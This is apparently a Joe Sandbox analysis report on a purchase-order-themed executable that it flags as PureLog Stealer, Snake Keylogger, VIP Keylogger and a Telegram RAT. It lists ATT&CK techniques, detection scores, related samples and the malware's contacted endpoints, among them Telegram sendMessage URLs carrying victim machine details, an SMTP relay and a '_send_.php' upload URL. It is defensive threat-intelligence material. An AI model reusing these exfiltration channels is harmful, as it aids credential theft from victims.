Source: Yara match	File source: 00000009.00000002.4513884239.00000000072C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.PO#17971.exe.70a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#17971.exe.2d9d95c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TZRtlifudvO.exe.254da24.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#17971.exe.70a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TZRtlifudvO.exe.254da24.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO#17971.exe.2d9d95c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2093507552.00000000070A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2130210299.00000000024D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2086741217.0000000002D74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match	File source: 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6e9fe5e.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810f20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.6810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.vbc.exe.6ea0d7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.vbc.exe.8d70000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7192, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 7584, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	311 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	4 Obfuscated Files or Information	Security Account Manager	24 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Software Packing	NTDS	131 Security Software Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	3 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	24 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	311 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PO#17971.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos
PO#17971.exe	42%	Virustotal		Browse
PO#17971.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	42%	ReversingLabs	ByteCode-MSIL.Trojan.Remcos

Source	Detection	Scanner	Label
http://docs.livestreamer.io/install.html	0%	Avira URL Cloud	safe
http://wap.5184.com/NCEE_WAP/controller/examEnquiry/performExamEnquiryWithoutAuthForGZ?categoryCode=	0%	Avira URL Cloud	safe
http://51.38.247.67:8081/_send_.php?L	0%	Avira URL Cloud	safe
http://us2.smtp.mailhostbox.com	0%	Avira URL Cloud	safe
http://wap.5184.com/NCEE_WAP/controller/examEnquiry/performRecruitedEnquiryWithoutAuth?categoryCode=	0%	Avira URL Cloud	safe
http://docs.livestreamer.io/players.html#Supported	0%	Avira URL Cloud	safe
http://wap.wirelessgz.cn/myExamWeb/wap/school/gaokao/myUniversity	0%	Avira URL Cloud	safe
http://docs.livestreamer.io/plugin_matrix.html#Supported	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	unknown
reallyfreegeoip.org	104.21.96.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	158.101.44.242	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2022:27:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.livestreamer.io/plugin_matrix.html#Supported	PO#17971.exe, TZRtlifudvO.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://www.office.com/	vbc.exe, 00000010.00000002.4514479372.0000000006BDF000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	false		high
http://us2.smtp.mailhostbox.com	vbc.exe, 00000009.00000002.4513884239.000000000730D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B8B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wap.5184.com/NCEE_WAP/controller/examEnquiry/performRecruitedEnquiryWithoutAuth?categoryCode=	PO#17971.exe, TZRtlifudvO.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://wap.wirelessgz.cn/myExamWeb/wap/school/gaokao/myUniversity	TZRtlifudvO.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://docs.livestreamer.io/install.html	PO#17971.exe, TZRtlifudvO.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://www.office.com/lB	vbc.exe, 00000009.00000002.4513884239.0000000007369000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006BDA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/chrippa/livestreamer/	PO#17971.exe, TZRtlifudvO.exe.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20a	vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	vbc.exe, 00000010.00000002.4514479372.0000000006BAE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/thebiffman/livestreamer-sharp-ui	PO#17971.exe, TZRtlifudvO.exe.0.dr	false		high
http://aborters.duckdns.org:8081	vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	vbc.exe, 00000009.00000002.4513884239.00000000072FD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B6B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anotherarmy.dns.army:8081	vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	vbc.exe, 00000009.00000002.4513884239.0000000007338000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006BA9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	vbc.exe, 00000009.00000002.4513884239.000000000723B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007280000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006AAA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	vbc.exe, 00000009.00000002.4513884239.0000000007280000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.00000000072A7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007211000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006B19000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006AF0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A80000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.livestreamer.io/players.html#Supported	PO#17971.exe, TZRtlifudvO.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://wap.5184.com/NCEE_WAP/controller/examEnquiry/performExamEnquiryWithoutAuthForGZ?categoryCode=	PO#17971.exe, TZRtlifudvO.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	PO#17971.exe, 00000000.00000002.2086741217.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.00000000071C1000.00000004.00000800.00020000.00000000.sdmp, TZRtlifudvO.exe, 0000000A.00000002.2130210299.0000000002411000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A31000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	vbc.exe, 00000009.00000002.4520711075.0000000008243000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4520711075.000000000848F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007CFE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4521159554.0000000007AB7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	vbc.exe, 00000009.00000002.4512089318.0000000006E5F000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.4513884239.0000000007211000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4513618257.0000000006810000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000010.00000002.4514479372.0000000006A80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000010.00000002.4526063025.0000000008D70000.00000004.08000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.96.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
158.101.44.242	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587573
Start date and time:	2025-01-10 15:02:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PO#17971.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/15@4/4
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 98% Number of executed functions: 194 Number of non-executed functions: 31
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target vbc.exe, PID 7584 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:03:35	API Interceptor	1x Sleep call for process: PO#17971.exe modified
09:03:37	API Interceptor	47x Sleep call for process: powershell.exe modified
09:03:40	API Interceptor	12798332x Sleep call for process: vbc.exe modified
09:03:41	API Interceptor	1x Sleep call for process: TZRtlifudvO.exe modified
15:03:38	Task Scheduler	Run new task: TZRtlifudvO path: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse
	https://ranprojects0s0wemanin.nyc3.digitaloceanspaces.com/webmail.html	Get hash	malicious	HTMLPhisher	Browse
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse
	gem1.exe	Get hash	malicious	Unknown	Browse
104.21.96.1	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	pelisplus.so/administrator/index.php
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
158.101.44.242	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	FORTUNE RICH_PARTICULARS.pdf.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PI ITS15235.doc	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PO#5_Tower_049.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ZOYGRL1ePa.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	checkip.dyndns.org/
	Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	PO#3_RKG367.bat	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	SOA NOV. Gateway Freight_MEDWA0577842.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0
	dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	1C24TDP_000000029.jse	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
reallyfreegeoip.org	IMG_10503677.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	104.21.48.1
